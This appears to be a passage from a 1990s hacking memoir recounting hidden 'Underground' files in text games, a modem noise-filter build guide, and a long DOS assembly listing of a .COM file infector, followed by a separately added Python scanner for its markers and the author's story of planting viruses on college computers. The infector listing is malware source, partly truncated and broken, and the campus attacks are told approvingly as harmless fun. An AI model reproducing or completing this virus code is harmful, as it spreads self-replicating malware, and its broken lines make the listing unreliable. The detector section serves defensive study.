But what intrigued me most in that first delivery of Underground software were the "cookbooks," exploits, and vulnerability secrets included on the disk. You see, these files weren't visible on casual inspection; they were all hidden. And when I say hidden, I don't mean hidden by changing attributes, but hidden as in buried deep within other program files.
To the best of my knowledge, this is the first time the information contained here has been revealed in published material, and it has been done so with permission from the Underground.
These hidden programs were mostly games, text games that wouldn't appeal to the typical gamer. Later I became aware of the "tiks," or triggers, throughout these text adventures. For example: "You find yourself in the northern corridor; there is a cold breeze from the east. An old rusted container lies on the floor. The walls are sweating with moisture. Visible directions: North, East." In this situation, multiple tiks were required to reveal hacking secrets. Earlier in the game I had found an old cloth parchment, with some scribble, which would later be translated into a map of directions. In the northern corridor, however, by typing:
wipe wall with cloth [RETURN]
get can [RETURN]
squeeze cloth in can [RETURN]
precisely like that, the result was:
Passme?
The password here was simple. I entered a total of three tiks to get to this point. The first part of the password contained the third letter of each word on the first line. The second part contained the second letter of each word on the second line, and the third part the first letter of each word on the third line. Therefore, in this case, the pass code was, "pltoeascic." But there was more.
But before getting into that, I want to show you another example. If only two tiks had been required, such as:
wipe wall with cloth [RETURN]
squeeze cloth in can [RETURN]
then the first part of the password would have included the second letter of each word on the first line, and the second part would have included the first letter of each word on the second line, in which case I would have entered "iailscic." This format held true throughout most of the tiks for many years; and for all I know it still does—though I doubt it, since the advent of more advanced cryptography and other encryption methods.
Back to the "more" I mentioned. I was referring to the missing link in the tik pass codes. The trick was to replace each letter "L" with the number "1," and each letter "O" with the number "0" in the passwords—not in the tiks themselves. Therefore, in the original tik entry:
wipe wall with cloth [RETURN]
get can [RETURN]
squeeze cloth in can [RETURN]
the correct pass code had to be entered as "p1t0eascic."
My initial reaction when I first encountered these hidden secrets was a combination of anticipation and excitement. The next screen contained textual hacker anthologies, some dating way back. The following is an excerpt on custom modem optimization:
With this circuit diagram and some basic tools (including a soldering iron, and four or five components from Radio Shack), you should be able to cut the noise/garbage that appears on your computer's screen.
I started this project out of frustration from using a U.S. Robotics 2400-baud modem, and getting a fair amount of junk when connecting at that speed. Knowing that capacitors make good noise filters, I threw this together.
This is very easy to build; however, conditions may be different due to modem type, amount of line noise, old or new switching equipment (Bell's equipment), and on and on. So it may not work as well for you in every case. Please read this entire message and see if you understand it before you begin.
What you'll need from Radio Shack:
• #279-374 modular line cord if you don't already have one. You won't need one if your phone has a modular plug in its base.
• #279-420 modular surface mount jack (4 or 6 conductor).
• #271-1720 potentiometer. This is a 5 K audio taper variable resistor.
• #272-1055 capacitor. Any nonpolarized 1.0 to 1.5 uf cap should do. Paper, mylar, or metal film caps should be used, although #272-996 may work as well. (272-996 is a nonpolarized electrolytic cap).
• 100 OHM resistor, quarter or half watt.
• #279-357 Y-type or duplex modular connector. Don't buy this until you've read the section on connecting the Noise Killer below. (A, B, or C).
First, open the modular block. You normally just pry them open with a screwdriver. Inside you'll find up to 6 wires. Very carefully cut out all but the green and red wires. The ones you'll be removing should be black, yellow, white, and blue. These wires won't be needed, and may be in the way. So cut them as close to where they enter the plug as possible. The other end of these wires has a spade lug connector that is screwed into the plastic. Unscrew and remove that end of the wires as well. Now you should have two wires left, green and red. Solder one end of the capacitor to the green wire. Solder the other end of the capacitor to the center lug of the potentiometer (there are three lugs on this critter). Solder one end of the resistor to the red wire. You may want to shorten the leads of the resistor first. Solder the other end of the resistor to either one of the remaining outside lugs of the potentiometer—doesn't matter which. Now, to wrap it up, make a hole in the lid of the mod block to stick the shaft of the potentiometer through. Don't make this hole dead center, as the other parts may not fit into the body of the mod block if you do. See how things will fit in order to find where the hole will go.
Now that you've got it built, you need to test it. First twist the shaft on the potentiometer until it stops. You won't know which way to turn it until later. It doesn't matter which way now. You also need to determine where to plug in the Noise Killer on the telephone line. It can be done in one of several ways:
A. If your modem has two modular plugs in back, connect the Noise Killer into one of them using a line cord. (A line cord is a straight cord that connects a phone to the wall outlet—usually silver in color).
B. If your phone is modular, you can unplug the cord from the back of it after you're online, and plug the cord into the Noise Killer.
C. You may have to buy a Y-type modular adaptor. Plug the adaptor into a wall outlet; plug the modem into one side and the Noise Killer into the other.
Call a BBS that has known noise problems. After you've connected and garbage begins to appear, plug the Noise Killer into the phone line as described above. If you have turned the shaft on the potentiometer the wrong way, you'll find out now. You may get a lot of garbage or even be disconnected. If this happens, turn the shaft the other way until it stops, and try again. If you don't notice much difference when you plug the Noise Killer in, that may be a good sign. Type in a few commands and look for garbage characters on the screen. If there still are, turn the shaft slowly until most of them are gone. If nothing seems to happen at all, turn the shaft slowly from one side to the other. You should get plenty of garbage or be disconnected at some point. If you don't/aren't, reread this message to make sure you've connected it right.
On the bottom of the page was a code sequence to abort and return to the game. Upon aborting, the command output field contained only the events that led up to entering the tiks. In this case, I found myself back in the northern corridor. Moving along in the game, after another series of events with specific tiks, additional screens included source code for some of the earliest viruses, such as this 20-year-old Assembly excerpt of one of the very first .com file infectors:
        mov     [bp + old_dta_off], bx          ; save old dta offset
set_dta:
        mov     ah, 4eh
        mov     cx, [bp + search_attrib]
        lea     dx, [bp + search_mask]
        int     21h                             ; find first file
        jnc     clear_attrib                    ; if successful dta created
        mov     ah, 4fh
        int     21h
        jnc     clear_attrib                    ; if found, continue
still_searching:
        mov     ah, 3bh
        lea
        int
        jnc                                     ; cd ..
        jmp     bomb                            ; at root, no more files
clear_attrib:
        mov     ax, 4301h
        xor     cx, cx
        lea     dx, [bp + dta_file_name]
        int     21h                             ; get rid of attributes
open_file:
        mov     ax, 3D02h
        lea     dx, [bp + dta_file_name]
        int     21h                             ; AL=2 read/write
        xchg    bx, ax                          ; save file handle
                                                ; bx won't change from now on
check_if_command_com:
        cld
        lea     di, [bp + com_com]
        lea     si, [bp + dta_file_name]
        mov     cx, 11                          ; length of 'COMMAND.COM'
        repe    cmpsb                           ; repeat while equal
        jne     check_if_infected
        jmp     close_file
        mov     dx, word ptr [bp + dta_file_size]   ; only use first
                dx, 2                               ; cx:dx ptr to offset
                                                    ; origin of move
        mov     ah, 3fh
        mov     cx, 2
        lea     dx, [bp + last_chars]
        int     21h                             ; read last 2 characters
        mov     ah, [bp + last_chars]
        cmp     ah, [bp + virus_id]
        jne     save_3_bytes
        mov     ah, [bp + last_chars + 1]
        cmp     ah, [bp + virus_id + 1]
        jne     save_3_bytes
        jmp     close_file
save_3_bytes:
        mov     ax, 4200h                       ; 00=start of file
        xor     cx, cx
        xor     dx, dx
        int     21h
        mov     ah, 3Fh
        mov     cx, 3
        lea     dx, [bp + _3_bytes]
        int     21h
goto_eof:
        mov     ax, 4202h                       ; 02=End of file
        xor     cx, cx                          ; offset from origin of move
        xor     dx, dx                          ; (i.e. nowhere)
        int     21h                             ; ax holds file size
        ; since it is a COM file, overflow will not occur
save_jmp_displacement:
        sub     ax, 3                           ; 3 = jmp disp.
        mov     [bp + jmp_disp], ax             ; file size
write_code:
        equate                                  ; to file
write_jmp:
        mov     ah, 40h
        mov     cx, 3
        lea     dx, [bp +
        int     21h
        inc     [bp + infections]
restore_date_time:
        mov     ax, 5701h
        mov     cx, [bp + dta_file_time]
        mov     dx, [bp + dta_file_date]
        int     21h
close_file:
        mov     ah, 3eh
        int     21h
restore_attrib:
        xor     ch, ch
        mov     cl, [bp + dta_file_attrib]      ; restore original attributes
        mov     ax, 4301h
        lea     dx, [bp + dta_file_name]
        int     21h
done_infecting?:
        mov     ah, [bp + infections]
        cmp     ah, [bp + max_infections]
        jz      bomb
        jmp     find_next
bomb:
        cmp     bp, 0
        je      restore_path                    ; original run
        ; Stuff deleted
restore_path:
        mov     ah, 3bh
        lea     dx, [bp + root]                 ; when path stored '\' not included
        int     21h
        mov     ah, 3bh
        lea     dx, [bp + org_path]
        int     21h                             ; cd to original path
restore_dta:
        mov     ah, 1ah
        mov     dx, [bp + old_dta_off]
        int     21h
restore_3_bytes:
        cld
        lea     si, [bp + _3_bytes]
        mov     di, 100h
        mov     cx, 3
        rep     movsb                           ; in memory; auto-inc si, di
return_control_or_exit?:
        cmp     bp, 0                           ; bp = 0 if original run
        je      exit
        mov     di, 100h                        ; return control back to Prog
        jmp     di                              ; -> cs:100h
exit:
        mov     ax, 4c00h
        int     21h

old_dta_off     dw      0                       ; offset of old dta address
;----------------- dta record
dta_filler      db      21 dup (0)
dta_file_attrib db      0
dta_file_time   dw      0
dta_file_date   dw      0
dta_file_size   dd      0
dta_file_name   db      13 dup (0)
search_mask     db      '*.COM',0               ; files to infect: *.COM
search_attrib   db      00100111b               ; all files a,s,h,r
com_com         db      'COMMAND.COM'
previous_dir    db      '..',0
root            db      '\',0
org_path        db      64 dup (0)              ; original path
infections      db      0                       ; counter
max_infections  db      1
_3_bytes        db      0, 0, 0
jmp_code        db      0E9h
jmp_disp        dw      0
last_chars      db      0, 0
virus_id        db      'AZ'                    ; do last chars = ID ?
eov:
virus_length    equ     offset eov - offset start
        end     start
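From a defender's side, the listing above gives away exactly what to look for: the infector refuses to reinfect a file whose last two bytes equal its virus_id ('AZ'), and it overwrites the first three bytes of a .COM file with a near jmp (opcode 0E9h plus a 16-bit displacement of file size minus 3) into the appended body. The following is an added example, not code from the book, that scans for that marker and checks the entry jmp; the sample image it tests against is constructed in memory and contains no virus code.

```python
# Added example, not from the original text: detect the on-disk traces the
# listing describes (trailing 'AZ' ID bytes, leading E9 jmp to the appended body).

import os
import struct

VIRUS_ID = b"AZ"          # virus_id from the listing's data area
JMP_OPCODE = 0xE9         # jmp_code: near jmp rel16
LOAD_ADDR = 0x100         # .COM images load at cs:100h


def looks_infected(image: bytes) -> bool:
    """True if the .COM image ends with the ID bytes and starts with a near jmp."""
    return len(image) >= 5 and image.endswith(VIRUS_ID) and image[0] == JMP_OPCODE


def jmp_target(image: bytes) -> int:
    """Address the entry jmp lands on: 100h + 3 + disp (16-bit wraparound)."""
    disp = struct.unpack_from("<H", image, 1)[0]
    return (LOAD_ADDR + 3 + disp) & 0xFFFF


def body_offset(image: bytes) -> int:
    """File offset of the appended body, derived from the jmp target."""
    return jmp_target(image) - LOAD_ADDR


def build_marked_sample(original: bytes, filler: bytes) -> bytes:
    """Constructed test image laid out like the listing: jmp over the original
    entry (disp = size - 3), original tail, appended filler, then the ID bytes."""
    disp = len(original) - 3
    return bytes([JMP_OPCODE]) + struct.pack("<H", disp) + original[3:] + filler + VIRUS_ID


def scan_directory(path: str):
    """Return the names of *.COM files in `path` carrying the marker."""
    hits = []
    for entry in os.scandir(path):
        if entry.is_file() and entry.name.upper().endswith(".COM"):
            with open(entry.path, "rb") as f:
                if looks_infected(f.read()):
                    hits.append(entry.name)
    return hits
```

jmp_target is the same arithmetic the listing performs in save_jmp_displacement, so on a marked file it points at the first byte past the original image, i.e. where the body was appended.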
Eventually, I accumulated 2.4 GB worth of hacker secrets, and had amassed the source for more than 2,000 well-known (as well as some lesser known) nasty infectors of every derivative (approximately 2 MB of the 2.4 GB). Looking back, I believe the rush of being part of a "secret society," coupled with a youthful ego, caused me to forgo my principles for a while, and I began to play hacker while in college. The computer center was where students did research, typed their papers, and hung out between classes. Typically, there was a waiting list for the workstations. I would habitually take note of the expressions on my fellow students' faces as they glared at the computer screens—primarily, they looked bored. And that's what inspired my first attack.
As an elective for a computer science degree, I had chosen an advanced programming class, which met three days a week, two of which were held at the computer center. My plan was simple—and harmless—and motivated by generating some excitement. Because programming was my forte, it didn't take me long to complete the programs required to finish the class requirements, and I had plenty of time to help others and to plant my custom-made virus.
Upon entering the center, each student had to produce an ID card, and sign in for a particular workstation. Therefore, I couldn't infect my system or those next to me, so I transferred the hack attack from floppy to stations where students had trouble getting through the exercises. The attacks were simple: Upon x system reboots (all counted in hidden files), the system would execute my virus, typically masquerading as a system file. The effects generally consisted of loud sounds, fake screen "melts," and graphical displays. And I always left my signature: Mr. Virus.
It wasn't long before the college paper began to publicize the attacks. And though the students had started looking forward to the next random attack, the administrators were frustrated, and did not have an inkling of how someone could continually circumvent the heavily monitored and supposedly secured center. I continued the attacks for eight weeks, each more imaginative than the last, and they became the topic of countless discussions.
The technical staff at the center failed to find the hidden traps and instead had to rebuild each station. Eventually, I was turned in by another student who had overheard me talking to a member of the group I hung out with. Upon my "capture," the administration informed me that ordinarily my exploits would have resulted in my expulsion; but because the students and staff had so enjoyed the attacks, and because my professors came to my defense, I was allowed to complete my courses. Needless to say, I heeded the warning.
I didn't know then that the really whacked-out introduction to the "other" side of the Underground was yet to come.
... to be continued in: Hack Attacks Denied.